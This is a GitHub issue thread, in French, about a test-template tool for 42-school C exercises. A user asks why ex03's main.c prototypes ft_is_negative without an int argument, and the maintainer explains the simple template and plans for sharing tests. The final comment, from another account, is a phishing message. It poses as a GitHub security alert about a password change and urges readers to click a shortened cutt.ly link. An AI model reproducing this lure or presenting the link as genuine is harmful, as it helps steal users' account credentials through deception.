### ISSUE TITLE
ex03

### ISSUE THREAD

**Issue by gokily** [malikbenkirane/42.automake#2]
Salut,

Merci pour ton projet.

J'ai une question sur le main.c de l'ex03. C'est normal que tu prototypes `void    ft_is_negative(void);`
alors que ca prend normalement un int en input ?
Ne pourrais tu pas faire en sorte qu'il teste les 3 cas (positif, negatif et nul) ? 

En tout cas merci !

**Comment by malikbenkirane** [comment]
Effectivement, pour l'instant l'outil fonctionne avec un template très simple
```
void _ft_name_(void)
```
Parce que je n'ai pas mis en place, pour l'instant, un process qui permettrais à ceux qui écrivent des tests de les partager et de les copier aux bons endroits, il faut modifier le `main.c` de l'exo correspondant quand le prototype n'est pas bon.

Pour le process en question,
Je souhaite garder séparés les test d'exos du projet. C'est pour la bonne raison que d'une part les tests sont spécifiques à des exercices et leurs problèmes et d'un autre côté `mtemplate` et `configure` sont des outils que j'aimerais garder (au mieux) indépendants de toute spécificité.

J'aurais bientôt  des premières idées sur le process (ca dépendra du temps que j'ai pour mettre en place tout ça). Je ferais savoir tout ça au moment venu et je veux bien avoir des propositions.

Le projet est d'ecrire un script qui cherche les main.c differents du template et qui préparerais un package avec ces tests. Ce serais cool d'avoir dans la foulée une documentation des tests (un readme.md en quelques sortes). Et de les push sur git dans des submodules (cf. Doc git submodules et `man 1 git-submodule`). Et pour finir forker le repo sur github et proposer des tests via des pull requests pour ceux qui sont en avancent et qui aimeraient proposer des tests interessants.

Voilà ! Merci pour l'intérêt pour le projet, à voir où  ça nous mènera !

**Comment by loic-dw** [comment]
# Security Alert

Your GitHub account was recently accessed to change your password. If you do not recognize this activity, it's crucial to update your password immediately to secure your account.

[Click here to change your password](https://cutt.ly/ChangePassword)
